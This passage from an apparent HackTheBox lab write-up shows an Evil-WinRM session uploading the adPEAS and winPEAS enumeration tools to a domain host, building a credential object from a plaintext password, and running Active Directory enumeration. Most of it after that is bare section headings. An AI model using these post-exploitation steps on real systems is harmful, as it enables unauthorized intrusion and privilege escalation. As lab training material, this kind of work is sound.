adPEAS


*Evil-WinRM* PS C:\Users\support\Documents> upload adPEAS.ps1
 
Info: Uploading /home/kali/archive/htb/labs/support/adPEAS.ps1 to C:\Users\support\Documents\adPEAS.ps1
Data: 4159704 bytes of 4159704 bytes copied
Info: Upload successful!

Delivery complete

*Evil-WinRM* PS C:\Users\support\Documents> $SecPassword = ConvertTo-SecureString 'Ironside47pleasure40Watchful' -AsPlainText -Force ; $Cred = New-Object System.Management.Automation.PSCredential('SUPPORT\support', $SecPassword)

Creating a PSCredential object of the support account for adPEAS

*Evil-WinRM* PS C:\Users\support\Documents> . .\adPEAS.ps1
*Evil-WinRM* PS C:\Users\support\Documents> Invoke-adPEAS -Domain 'SUPPORT.HTB' -Server 'dc.support.htb' -Cred $Cred

Executing adPEAS

General


SeMachineAccountPrivilege


winPEAS


*Evil-WinRM* PS C:\Users\support\Documents> upload winPEASany.exe
 
Info: Uploading /home/kali/archive/htb/labs/support/winPEASany.exe to C:\Users\support\Documents\winPEASany.exe
Data: 2625536 bytes of 2625536 bytes copied
Info: Upload successful!

Delivery complete

Executing PEAS

ENV


LAPS


LSA


CredentialGuard


Firewall & AV


PEAS flagged no AV

UAC


KrbRelayUp


NTLM


Privileges


As the current support account

DNS cached


WSL